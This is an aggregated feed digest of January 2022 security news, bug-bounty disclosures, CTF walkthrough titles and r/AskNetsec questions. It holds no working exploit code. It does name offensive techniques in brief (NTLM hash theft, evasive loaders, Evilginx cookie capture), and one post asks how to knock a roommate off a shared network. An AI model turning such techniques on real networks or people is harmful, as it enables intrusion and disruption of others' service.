    Article URL: https://go.dev/doc/tutorial/fuzz Comments URL: https://news.ycombinator.com/item?id=29980566 Points: 1 # Comments: 0  ( 11 min )
  • Open

    The Tale of a Click leading to RCE
    In today’s industry, we often hear that humans may weaken a company’s security leading to a potential breach. At ManoMano we highly… Continue reading on ManoMano Tech Team »  ( 11 min )
  • Open

    Top 5 Best Fuzzing & Vulnerability Research TIPS
    submitted by /u/pat_ventuzelo [link] [comments]
    Rust vs. C: How are vulnerabilities different? An analysis on the vulnerabilities in the two programming languages and what to look for.
    submitted by /u/ragnarsecurity [link] [comments]  ( 1 min )
  • Open

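    Cybercrime case analysis: the 12306 ticket-grabbing industry chain
    Buying and selling citizens' information and developing registration software constituted the crimes of infringing citizens' personal information and providing programs for intruding into computer information systems; the sentence was three years' fixed-term imprisonment and recovery of the illegal gains.  ( 1 min )
    Interview with Xia Luning of 数字认证: cryptography + cloud unlocks more security service models
    When traditional cryptographic technology meets the popular “cloud”, cryptography takes on new vitality and brings enterprises more advantages.  ( 1 min )
    Nintendo warns users to beware of Switch discounts on fake websites
    These websites use official logos to deceive Nintendo users and fans into believing they are official pages, and use steep discounts as bait to get them to buy Nintendo products that are very likely “fakes”.
    2021 IoT device CVE leaderboard
    As a company focused on IoT security, we have compiled the CVE numbers and descriptions of some of the higher-scored CVEs for the following brands.  ( 2 min )
    Researchers find high-severity vulnerability in three WordPress plugins
    WordPress security company Wordfence discovered a serious vulnerability that affects three different WordPress plugins and has impacted more than 84,000 websites.  ( 1 min )
    What is SASE (Secure Access Service Edge)? The concept and use cases in one diagram
    SASE is so popular; understand it in one diagram
    「网安知识大陆」 prize feedback call | Let's go fault-finding together
    知识大陆 is collecting feedback, with prizes~  ( 1 min )
    FreeBuf Morning Briefing | Oracle fixes 483 vulnerabilities in January; Chrome restricts websites' direct access to private networks
    The January 2022 Oracle Critical Patch Update (CPU) states that the Oracle security update will address 483 new security patches; a Critical Patch Update is a collection of patches for multiple security vulnerabilities.  ( 1 min )
    Zero trust security market to reach USD 64.4 billion by 2027
    China, as the world's second-largest economy, is expected to reach a market size of USD 11.1 billion by 2027.  ( 1 min )
    The top three malware families in Linux environments
    Linux systems are commonly deployed in IoT devices, and the most common abuse is using IoT devices to carry out DDoS attacks. The top three malware families are XorDDoS, Mirai and Mozi.  ( 1 min )
    New Apple Safari browser vulnerability sounds the alarm on cross-site user tracking
    Anti-fraud software company FingerprintJS recently disclosed that an IndexedDB API implementation vulnerability in Safari 15 has already been exploited by malicious websites.  ( 1 min )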
  • Open

    SSRF vulnerability in VMware authentication software could allow access to user
    Article URL: https://portswigger.net/daily-swig/ssrf-vulnerability-in-vmware-authentication-software-could-allow-access-to-user-data Comments URL: https://news.ycombinator.com/item?id=29978942 Points: 3 # Comments: 0  ( 4 min )
  • Open

    IT Security in Web Applications I — Injections
    represent building blocks of many services. In particular, the strategic shift of many companies to the cloud underscores the critical… Continue reading on Medium »  ( 3 min )
  • Open

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.  ( 3 min )
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…  ( 16 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.  ( 4 min )
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here  ( 5 min )
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices  ( 3 min )
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…  ( 2 min )
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1  ( 5 min )
    Authentication Bypass -TryHackMe
    Writeup  ( 3 min )
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it  ( 3 min )
  • Open

    DOM XSS through ads
    Urban Dictionary disclosed a bug submitted by bemodtwz: https://hackerone.com/reports/889041

  • Open

    Is Google Authenticator impenetrable?
    Title is hyperbole obviously. Out of different 2FA methods SMS was weak because you could get sim swapped Authy was weak because a hacker could switch it to their phone if they could get into your email. GA can't be moved from phone to phone so it can't be taken over by hacker who gets access to your sim card and email. My impression is that any account protected by GA is safe. Why is this wrong? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    What is "round tripping" in HTML/GO?
    ELI5 if you can. I'm learning so much from you guys! Thank you! submitted by /u/iExtrapolate314 [link] [comments]
    Newly created InfoSec role within IT department - what should I be doing to get it right?
    Hello AskNetSec! I'm not sure how else to word the title, so hopefully it's acceptable. Basically, I have been working in different facets of IT for 14 years. My current role is within IT operations as a systems engineer, but it's possibly evolving to be the first true role with an official information security component within the IT department at my company. I'm excited because I've always enjoyed the security aspects of my roles over my career, and my formal education was focused on information security. However, I recognize that I have no formal work experience in a security-specific role, and as such I feel like I'm "winging it". I don't really know what a formalized incident response looks like within an established security department. I don't know what tools I have at my disposal, or should have at my disposal, to do my job effectively. I also realize that I may be overthinking it. But truthfully, I have no point of reference. So I come to you all and ask for some opinions and insights to navigate as the sole person with these newly added responsibilities that I would liken to a security analyst, and do so in a way that makes sense and is effective. I'm happy to do my own reading and self-learning (I have access to PluralSight, if that would be useful), but also hoping maybe someone with experience can give some practical pointers and/or high-level procedural advice since I will likely be shaping this new role in coordination with my management. Thank you all in advance! Edited because my brain moved faster than my fingers could type :( submitted by /u/unseenspecter [link] [comments]  ( 5 min )
    How to create a rule that allows only one country with ModSecurity
    Hi all, Does anyone know how to write a rule for ModSecurity to only allow access to a website from one country? I'm currently using this rule: SecGeoLookupDb /usr/share/GeoIP/GeoIP.dat SecRule REMOTE_ADDR "@geoLookup" "chain,id:22,drop,msg:'Non-GB IP address'" SecRule GEO:COUNTRY_CODE "!@streq GB" Which is saved in the rules directory as: modsecurity_crs_15_customrules.conf And I have also changed the owner of /usr/share/GeoIP/GeoIP.dat http for nginx. But the website is still getting traffic from outside of UK. Any help and pointers would be greatly appreciated. submitted by /u/Rurisk89 [link] [comments]  ( 1 min )
    Small business honeypot recommendations?
    I started working internal IT for a small business late last year who had been ransomed twice. Their (soon to be) ex MSP still had RDP open to the world, so no wonder... Anyway, among the many other projects currently running I'm considering setting up some honeypots for additional protection. The business still has a number of accounts with weak password tied to their applications so will be while before they're sorted out. Is this something that would be worthwhile? Any what tools have you used/would recommend? I'm looking for open source if/where possible. Thank you in advance :D submitted by /u/brettfk [link] [comments]  ( 1 min )
    Can HTTPS web traffic over a VPN be intercepted & decrypted if the router the PC is connected to is compromised? Can an attacker do this with tools available on a smartphone?
    submitted by /u/ferengiprophet [link] [comments]  ( 1 min )
    Can I ensure a pdf is clean by "printing to pdf" before sending?
    I want to email a pdf I downloaded from Library Genesis. It's an old scanned book I couldn't find anywhere else. I need to share it, but on the off chance there's anything malicious there, is there anything I can do to send a "cleaned" version? If I create a new pdf by printing to pdf, would that be safe? submitted by /u/sonsa_geistov [link] [comments]  ( 1 min )
    What is an XSS injection? How is it used? What vulnerabilities does it create?
    Also, someone elsewhere on the internet claimed that XSS can get around Cloudflare. How? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
  • Open

    Lots of movies and TV shows in the "disk" folders, download speed is decent
    submitted by /u/feelingsupersonic [link] [comments]  ( 1 min )
    Browser Extension for Saving Images As While Browsing
    Before you tell me to just shill for a VPS, run a crawler and some scripts; I would like to offer some insight. I like collecting old web GIFs and pixel art. These are typically from websites which are hardly active, or in some cases no longer online. Places other people would, usually, share on r/opendirectories. Ergo, whenever I pick these out it's already going to be a manual process. I suppose I can just right click + save as, a few hundred times, but I have found Pinterest's "Save Button" to also be convenient. It's an extension that scans the entire page quickly, and you can choose what to save through a convenient menu, and it even builds a gallery for me. I want to reshare these, so I don't consider it a violation of my privacy that they are being exposed under my account name. False Account Suspensions aren't unheard of, but it's been working for me so far. Except whenever I need to save any image smaller than 100x100 pixels. Pinterest has a restriction requiring all images to be above 100x100 in resolution, so in this case you have to Save As, pad out the background and then upload. Which is again, a level of tedium I would like to avoid. So, would any of you lovely folks happen to know any decent alternatives? submitted by /u/themadprogramer [link] [comments]  ( 3 min )
    The chiptune archive is back!
    Hey all, it's been a long time. I had my chiptune archive brought down because of the domain, and now it's back, under my own domain. The link is https://chiparchive.com/files if you all want to talk to me on twitter. It's https://twitter.com/thechiptunearc1 submitted by /u/jreina2002 [link] [comments]
  • Open

    Critical XSS in chrome extension
    Chrome extensions have a feature to inject content scripts containing JavaScript code in a web page. By using the standard Document Object… Continue reading on Medium »  ( 2 min )
    Bug Bounty Hunting
    You might wonder what this bug bounty hunting is. Is it hunting bugs or what? Well certainly its you hunting down bugs but not the ones we… Continue reading on Medium »  ( 2 min )
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here. Continue reading on InfoSec Write-ups »  ( 3 min )
    IDOR leads to 2fa Bypass
    Hello Everyone, my name is Arth Bajpai, and I’m back with another writeup Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - SQL INJECTION LAB SOLUTIONS
    PortSwigger Web Security, made up of labs that host web security vulnerabilities and cover the Owasp top 10 vulnerabilities, is a web… Continue reading on Medium »  ( 15 min )
    Jobs in Cybersecurity
    hello guys, are you excited to learn cybersecurity or ethical hacking ,You are curious about how things work and have thirst in learning… Continue reading on Medium »  ( 3 min )
    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    SSRF & Blind XSS in Gravatar email
    Automattic disclosed a bug submitted by rockybandana: https://hackerone.com/reports/1100096 - Bounty: $750
    Clickjacking
    Palo Alto Software disclosed a bug submitted by paramdham: https://hackerone.com/reports/688546
  • Open

    Registry Analysis - The "Why"
    Why is Registry analysis important? The Windows Registry, in part, controls a good bit of the functionality of a Windows system. As such, Registry analysis can help you understand why you're seeing something, or why you're not seeing something, as the case may be. For example, Registry "settings" (i.e., keys, values, or combinations) can be/have been used to disable Windows Event Logs, enable or disable auditing (the content that goes into the Windows Event Log), disable access to security tools, enable or disable other functionality on Windows systems, etc. The Registry can be used to enable or disable application prefetching, which produces artifacts very commonly used by forensic analysts and incident responders. Most analysts are aware that, particularly with respect to the file sy…  ( 7 min )
  • Open

    Analyzing Binaries with Radare2
    submitted by /u/DLLCoolJ [link] [comments]
    Attacking RDP from Inside: How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
    zimawhit3/HellsGateNim: A quick example of the Hells Gate technique in Nim
    submitted by /u/dmchell [link] [comments]
  • Open

    Show HN: InternetDB API – Fast IP Lookups for Port and Vulnerability Information
    Article URL: https://internetdb.shodan.io Comments URL: https://news.ycombinator.com/item?id=29970480 Points: 2 # Comments: 0
    Same-origin violation vulnerability in Safari 15 could leak a user’s website
    Article URL: https://portswigger.net/daily-swig/same-origin-violation-vulnerability-in-safari-15-could-leak-a-users-website-history-and-identity Comments URL: https://news.ycombinator.com/item?id=29968460 Points: 37 # Comments: 13  ( 4 min )
  • Open

    Capturing RDP NetNTLMv2 Hashes: Attack details and a Technical How-To Guide - GoSecure
    submitted by /u/obilodeau [link] [comments]
    Domain Persistence – Machine Account
    submitted by /u/netbiosX [link] [comments]
  • Open

    Algorithms for software testing
    submitted by /u/WillyRaezer [link] [comments]
  • Open

    SecWiki News 2022-01-17 Review
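    Yasso: a powerful toolkit to assist internal-network penetration testing by ourren SecWiki Weekly (Issue 411) by ourren Analysis report on forms of virtual-currency crime in China (mainland), 2021 by ourren For more of the latest articles, visit SecWiki  ( 2 min )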
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

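    ThinkPHP framework penetration testing in practice
    With thinkphp in debug mode, if the server allows external database connections, a large number of requests can be sent by brute-forcing the mysql service (causing mysql to block).  ( 1 min )
    FreeBuf Morning Briefing | Walmart quietly enters the metaverse; Safari browser vulnerability allows cross-site user tracking
    Walmart will offer users virtual currency and NFTs.  ( 1 min )
    Security competition for domestic computer peripherals and Xinchuang (IT innovation) products: Tophant wins the “Outstanding Organization Award”
    Tophant won the “Outstanding Organization Award” in the 2021 “Cybersecurity Crowdsourced Testing Platform” security competition for domestic computer peripherals and Xinchuang products
    Winter Olympics countdown! Tophant's “cybersecurity assurance corps” will deliver on its mission
    Tophant is providing dozens of central and state-owned enterprises with pre-Olympics cybersecurity assessment services and on-duty defense services during the Games, fully safeguarding the security of the Winter Olympics' core systems and network assets.
    The standard “Competency Requirements for Cybersecurity Industry Talent Positions” is officially released
    The body of the standard is divided into six parts, covering the standard's scope of application, normative references, terms and definitions, main directions and positions, competency elements, and other aspects.
    Well-known software abused: beware of backdoors being opened on your host
    Attackers use phishing to lure victims into clicking and running the trojan attached to an email, and carry out the attack in combination with the legitimate Adobe CEF Helper program.  ( 1 min )
    What is an SSL stripping attack?
    An SSL stripping attack is a network attack in which the attacker downgrades a web connection from the more secure HTTPS to the less secure HTTP.  ( 1 min )
    EU conducts a cyberattack exercise against a “virtual” power company
    Last week the EU carried out a simulated cyberattack exercise against a “virtual” power company in Finland.
    National Information Security Standardization Technical Committee releases the draft for comment of the national standard “Information Security Technology: Guide to Identifying Important Data”
    The Guide clarifies the definition of “important data”: data that exists in electronic form and that, once tampered with, destroyed, leaked, or illegally obtained or used, may endanger national security or the public interest.  ( 1 min )
    Russia claims to have taken down the well-known ransomware gang REvil
    Russia's Federal Security Service (FSB) announced that it has taken down the REvil ransomware gang, which was behind a series of attacks against large organizations such as Kaseya and JBS USA.
    2022 cybersecurity trends: 7 heating up, 2 cooling down
    Nine major security trends for 2022; the scope and sophistication of attacks are expected to become even harder to deal with in the new year.  ( 1 min )
    What clustering algorithms are there, and how are they classified?
    To understand clustering algorithms and to distinguish and compare them, it is best to understand the specific algorithms in the context of clustering analysis as a whole.  ( 1 min )
    30 commonly exploited software vulnerabilities of 2020 and 2021
    As for all the 0-days, custom malware and other completely unknown security vulnerabilities, they have existed for years and been widely exploited.  ( 1 min )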
  • Open

    Android Application Malware Analysis
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    Dynamic execution with DInvoke
    After several months of development, and now that the latest features have been added to the project, I think Dinvoke_rs is ready for… Continue reading on Medium »  ( 7 min )
  • Open

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )

  • Open

    How do cryptocurrency exchanges like Coinbase defend against man in the middle attacks (MItM)?
    Referring specifically to applications like Evilginx that create fake log in pages and collect session cookies. A session cookie is what the website gives you after you complete signing in (username + password + 2FA) to remember that you did. The tool collects this cookie and passes it to the hacker if you're foolish enough to use their fake log in page. Do Coinbase, Binance, etc have any protections in place to defend against this? Inb4 don't be stupid: some people are stupid. They deserve to not be robbed. submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Just completed my Security+. What should I do next
    Just completed my Security+ and not sure what I should do next. Interested more in Blue team than red team. submitted by /u/Linux98 [link] [comments]  ( 1 min )
    Facebook lite app whitehat settings guide
    Hi, I'm trying to follow Facebook guide to intercept Facebook lite android application which uses binary protocol instead of http. I'm using burp on linux. The section is called "Enable settings from Facebook Lite on Android" https://www.facebook.com/whitehat/education/testing-guides I'm stuck with NoPE Proxy extension which intercept traffic. The enable checkbox can't be checked, even if I launched burp as root. https://i.ibb.co/1TN0jgz/1.png In wireshark I get, port unreachable after I set my phone dns to my machine IP as mentioned in fb guide. https://i.ibb.co/q0vfStt/2.png Help, please! I want to intercept Facebook lite android application traffic ! submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Information Security Analyst questions
    Is Information Security Analyst the same as Cyber Security? Can I work in Information Security and be Information Security Analyst with bachelor IT degree plus certifications? Can I work in Cyber Security field and be Cyber Security with bachelor IT plus certifications? Can I get into Information Security Analyst and/or Cyber Security field without a degree at all? What certifications you guys recommend? I am thinking doing CompTIA Security+, but first I need to get training going: https://www.comptia.org/training/by-certification/security What is your salary, experience year, and state? Anyone live in FL and doing Information Security Analyst can give me insight of this job market situation in FL. Is it bad? How is the pay? What do you do in this field? Is it hard? Is this career good though? submitted by /u/OlympicAnalEater [link] [comments]  ( 3 min )
    Endpoint security confusion
    I have heard a lot of fuss going around regarding endpoint security. Having a background in IT development, I figured that this is what was meant: Https://somepage.com /login.php <--- endpoint But after a little bit of googling it sounds like it has nothing to do with endpoints. Could somebody explain this to me? Or what to search for? submitted by /u/kusichta [link] [comments]  ( 2 min )
    Do you include CVEs on your resume?
    If you have “accredited” CVEs how do you list them on your resume? Do you link to the NIST website or to a security advisory with your name in it? Thoughts? submitted by /u/BadCSCareerQuestions [link] [comments]  ( 1 min )
  • Open

    You're running untrusted code!
    submitted by /u/nfrankel [link] [comments]  ( 1 min )
    Free copy of The ssh Plumber's Handbook
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
  • Open

    Digital forensics: Investigation VS Security
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-16 Review
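    Security academic conference rankings (2021 edition) by ourren Graph Embedding in practice series: Node2vec principles and hands-on code by ourren A first look at WebAssembly by ourren Interpreting modern cybercrime patterns by ourren For more of the latest articles, visit SecWiki  ( 2 min )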
  • Open

    Bug Type: HTML injection in confirmation Email !
    Hey Everyone! This is about another low-hanging fruit (I’m still not a pro) in one of the web applications listed by OpenBugbounty. Continue reading on Medium »  ( 2 min )
    Advanced persistent threat (APT)
    When a system is under attack, Most of people think it as a one-time transfer. when a hacker finds a way to enter into the system, he… Continue reading on Medium »  ( 1 min )
    WTF IS IDOR!?
    One of the most crucial Vulnerabilities listed in top 10 of OWASP is Insecure Direct Object Reference Vulnerability (IDOR Vulnerability)… Continue reading on Medium »  ( 3 min )
    Authentication Bypass -TryHackMe
    Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i was able to see Sensitive Information on One of the India’s best School Website.
    Hello Readers, Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide
    Below is a flow diagram based on my experience on how you should start your bug bounty journey. Irrespective of your technical background… Continue reading on Medium »
  • Open

    Dark Web Scraping by OSINT - Scraping & Tools
    ➢ Dark Web Scraping & Tools Continue reading on Medium »  ( 5 min )
    Dark Web Scraping by OSINT - Darknet & TOR
    ➢ History of the Dark Web Continue reading on Medium »  ( 4 min )
    Dark Web Scraping by OSINT - OSINT & Hidden Internet
    ➢ What is OSINT? Continue reading on Medium »  ( 2 min )
  • Open

    DIY wood chippers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    I couldn't think of a title so here is a start a long long of music..Feeling sublime? Dont be a tool.I have the cure, If you go three doors down you might see some bare naked ladies!
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

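    FreeBuf Morning Briefing | China's cybersecurity market to maintain growth above 15% over the next three years; Linux malware grew 35% in 2021
    The China Cybersecurity Industry Alliance released the “China Cybersecurity Industry Analysis Report (2021)”, forecasting that over the next three years the cybersecurity market will maintain a growth rate above 15%, with the market size exceeding 80 billion yuan by 2023.  ( 1 min )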
  • Open

    Lack of URL normalization renders Blocked-Previews feature ineffectual
    Slack disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1102764 - Bounty: $1000
  • Open

    Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
    submitted by /u/dmchell [link] [comments]
  • Open

    Are there examples where two apps together on a device introduced a vulnerability where neither alone necessarily would?
    I'm looking for examples where the interplay between two apps led to a vulnerability which wouldn't exist if either of these apps were present alone. I can think of a contrived ways on paper where something like this could happen, e.g. App A creates what it thinks is a uniquely named file and places it somewhere common. App B uses that same file name + path and does limited/no checking that it's created by App B and not another app and leads to undesirable effects. (One could argue this is a vulnerability in App B by itself but) But are there actually examples where something like this has happened? Someone's banking app is compromised because they also have the Delta app on their phone, etc. etc. Thanks for satiating my curiosity. submitted by /u/CorbinGDawg69 [link] [comments]  ( 1 min )

  • Open

    How i found “Broken Access Control Through out-of-sync setup” and got $1000
    Hello everyone ! , Hope you all are doing well, I would like to share my “Broken Access Control Through out-of-sync setup” Continue reading on Medium »  ( 6 min )
  • Open

    BreadMan Module Stomping & API Unhooking Using Native APIs
    submitted by /u/dmchell [link] [comments]
  • Open

    Need your ideas for my Master's year project
    My project is on Honeypot, so basically what I did till now is, I have deployed T-Pot Honeypot on my machine and started getting attacks on it and my plan is to create firewall against those attacks. I am also thinking to do a comparison analysis of SIEM tool : ELK and Splunk but not sure I should do it or not. So, I need you to give some more ideas like what else can be done and how should I create firewall? Thanks in advance. submitted by /u/GuireccSS [link] [comments]  ( 1 min )
    Blocking DNS over HTTPS
    basically 443 already headache since cannot decrypt traffic for all of devices but i think DNS over HTTPS is one of the important items. Anything can be done besides manually blocking some known dns providers list? Adding note: Purpose is network security, dont want dns over http on the network. I know not only dns can be passed through 443 but this seems like most important submitted by /u/shodanless [link] [comments]  ( 2 min )
    Creative ways to knock someone off router using too much bandwidth?
    We have pretty slow internet at our house and it’s split across myself and a few roommates. One roommate in particular is doing…something where the bandwidth my other roommate and I get basically drops to zero for hours on end. We’ve asked them to be more considerate, and they don’t seem interested in sharing what awful internet we have. Obviously we could just log into the router and blacklist his devices, but the router is in his room, so he can just unplug it and then we’re all screwed. What are some more “creative” ways to knock his devices off the network, or otherwise prevent them from hogging all the bandwidth on the network, that doesn’t involve access to the router? Edit: I appreciate the great advice coming out of AskNetsec about communication and other interpersonal skills, loving the high empathy in this community. That said, let’s keep this to a very narrow threat model with the assumption that: the roommate is unwilling to communicate installing any new hardware is impossible access to the router is impossible buying a 2nd internet connection is impossible The model therefore should be the targets computer, which must be impacted by the actors computer directly, through the router possibly, but without changing any settings on it submitted by /u/JamieOvechkin [link] [comments]  ( 5 min )
    Who do we hire and why?
    Some of the past subjects and replies seems to imply there are alot of questions on what is a qualified cyber security employee. So lets try to help the boys and gurls that want to enter this career and are not sure of what we are looking for. So for all you hiring managers and anyone that was involved in hiring decisions for Cyber Security hires in the past 5 years(Pre and post covid) Please answer the following questions and lets see if we can give the prospects some ideas on what they need vs what they think they need. 1. Industry, job title/descriptions and ball park salary. Education – Cyber Security Jr Analyst, assist the cyber security team in daily duties. $35k Auto Motive – Sr Cyber Security Engineer, SME in Email, cloud EDR/XDR, C level reporting and mentoring. $150k Auto Mot…  ( 4 min )
    Is 1.1.1.1 a VPN?
    submitted by /u/Environmental_Camp24 [link] [comments]  ( 1 min )
    Secure Boot is silently disabled after a BIOS upgrade
    Hi. I'm new to this subreddit, so I'm not sure if my question is appropriate here. Feel free to direct me to another subreddit. After installing the beta version 7B86vAG4 of the BIOS for my MSI B450-A PRO motherboard, Secure Boot silently stopped working. That is, it boots any OS, for example, the Arch Linux installation medium. I see this behavior with factory default Secure Boot keys which likely are MSI's and Microsoft's keys and with my own keys. But keys shouldn't matter since the Arch Linux installation medium isn't signed by anybody: The official installation image does not support Secure Boot (FS#53864). To successfully boot the installation medium you will need to disable Secure Boot. source I reverted to the version 7B86vAD where Secure Boot works as expected. The last reply from the MSI support was: I: I do not use Windows at all. Support: Generally speaking, the secure boot won't take effect if you system cannot be supported. Please don't worry about it. Thanks! Well, I don't think I shouldn't worry about that. Secure Boot should work irrespective of the OS in this case since the OS isn't even booted. There are many people using Secure Boot with Linux. I would like to know whether this is just my motherboard or I set up Secure Boot incorrectly. If it's not just me, I feel obliged to report this bug somewhere. A user won't see it if they set up Secure Boot before upgrading their BIOS. submitted by /u/beroal [link] [comments]  ( 1 min )
    Do you allow google docs to your employees on the LAN?
    Hi Folks As we all know Google Drive/Docs/Sheets, Dropbox or any other cloud storage are major vectors for malware so we are blocking them in our corporate LAN. Lately, our organization employees satisfaction department in HR started conducting surveys using Google doc by sharing link with all employees and asked IT department to ensure it is working on all desktops. Is it safe to allow ? I understand there are security risks but a business demand on the other hand that needs to taken care of. Can someone give second thought on this please? Would love to have your valuable inputs submitted by /u/techno_it [link] [comments]  ( 2 min )
    Best automated pen testing software
    Hi folks, I have a vendor that will require me to open an application to the web for credit card processing. I don't believe they're taking security seriously so I'm currently looking at hiring a vendor to do penetration testing for that app through the firewall. However, if the bids come in too high, and just for ongoing testing in general, I'd like to learn what knowledgeable folks use for automated penetration testing. Please don't say, "Kali" unless you can help me with a specific program I can use on that veritable swiss army knife of hacking tools. :) Thanks in advance! submitted by /u/Leeto2 [link] [comments]  ( 3 min )
    HELP! Should I consider myself hacked/go into panic mode over this?
    Three months ago I received a newsletter from AltCoinTrader.co.za on my Gmail inbox. However, I never signed up for this site. I initially brushed it off for peace of mind. But I keep getting scared every time I remember it so I wanted to finish it by contacting the site's support and ask if my email was ever registered with them. To my horror, they said that someone did register but did not activate the account in May 2020. However, I could not find an activation email in my inbox, which has me worried that someone does have access to it and deleted it before I could see it. It is unlikely to be me since I wrote an email around the same time and other useless emails at that time period are still there. I have switched PCs since May 2020, but have kept my phone. My Gmail also has a new password + 2FA now. However, the new PC did share the same network briefly with my old PC. I very recently re-opened my old PC and did a thorough malware scan. Unfortunately, it found 3 Trojans. Current PC has had a clean bill of health so far. Problem is I have done very sensitive stuff on that PC from credit card details, SSN, online banking passwords, and, worst of all, confidential information for my work, including customers' personal data. I still don't know if I should treat this as a confirmed hack and/or full-on panic. Aside from this anomaly and the Trojans, the only other weird thing is my phone keeps logging account activity by itself sometimes (which I assume is it just pinging Google servers). Apart from that none of my accounts showed any signs of compromise. I also consulted someone earlier who said the Trojans could possibly be unrelated. And it is unclear what the motive is for someone to use someone else's email for crypto trading and log in to the account only to delete the confirmation email. Please help me with this. This is so strange, and a lot is at stake if I was compromised. I might actually get hospitalized over the stress from this.
submitted by /u/WrestleMaykr [link] [comments]  ( 2 min )
    Wordlist Generation for Password Cracking
    I have been researching software to use to generate wordlists for password cracking but haven't been able to find one that generates passwords given parameters (birthday, hobbies, etc.) Does anyone know of any software that can do this or should I just try to create my own? Thanks in advance submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    Being aggressively targeted how can I make a VM that cannot put anything on my host machine?
    Hello everyone first off I just want to say great community, second of all, I have a question that needs severe attention. Me and my father are being aggressively targeted from malware writers for a reason I don't want to reveal, we didn't do anything bad, we aren't bad people, it's because of what we have. I would rather not spend the money for Sophos Sandstorm, or any of the other costly products out there when this can all be done open source, and with some smart minds. I need to have Windows 10 on my machine for business software unfortunately, or I'd jump to Linux. Either way, I am still a target. I need to put a VM on my machine (if that's the best way to do this, if not please say so), or multiple VMs. I need to know which VM to use, and how to make it so that if I do get malware on my VM, which I would be using all the time, it will not be able to pass through and attach itself on to my host machine. How exactly is this possible, and what settings do I need to set, what Linux distro should I use, and will I be safe using the business software which is Win10 only on a VM? I can use the software with my Ethernet unplugged, and I have no WNIC on my PC. Thank you very much for your help, it is appreciated more than you know. submitted by /u/pixeldev [link] [comments]  ( 4 min )
    Issues with GIAC labs?
    I have a buddy who is studying for a GIAC exam who says the labs on the practice tests are trash. Can anyone confirm this? Is this a common issue? submitted by /u/sephstorm [link] [comments]  ( 1 min )
    Deleted Google account
    I am trying to recover data from a deleted Google account. I have local law enforcement requesting all data related to the Google account. Are we going to be able to recover deleted emails and other files? submitted by /u/LS2fast [link] [comments]  ( 1 min )
  • Open

    Toolbox HackTheBox Walkthrough
    Introduction Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping The post Toolbox HackTheBox Walkthrough appeared first on Hacking Articles.  ( 4 min )
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Introduction Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always The post Multiple Files to Capture NTLM Hashes: NTLM Theft appeared first on Hacking Articles.  ( 5 min )
  • Open

    IndexedDB in Safari 15 leaks your browsing activity in real time
    submitted by /u/Synchisis [link] [comments]  ( 1 min )
    A Detailed Guide to cracking the OSWE Certification
    submitted by /u/YashitM [link] [comments]
    10 real-world stories of how we’ve compromised CI/CD pipelines
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-15 Review
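    End-to-end models in practice for employee attrition early warning by ourren; A first look at common attack techniques of the internet underground economy by ourren; Zeek - Detect Godzilla WebShell by ourren; Thoughts on the evolution of cloud firewall products by ourren; MSF+: generating trojans whose traffic evades antivirus detection by ourren; Dissecting the OceanLotus group's malicious file customization strategy by ourren; r3kapig skill stack 1.0 by ourren; Building an information security training system at X通 by ourren; ATT&CK Techniques to Security Events by ourren. For more recent articles, visit SecWiki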
  • Open

    science books & papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Google Search operators
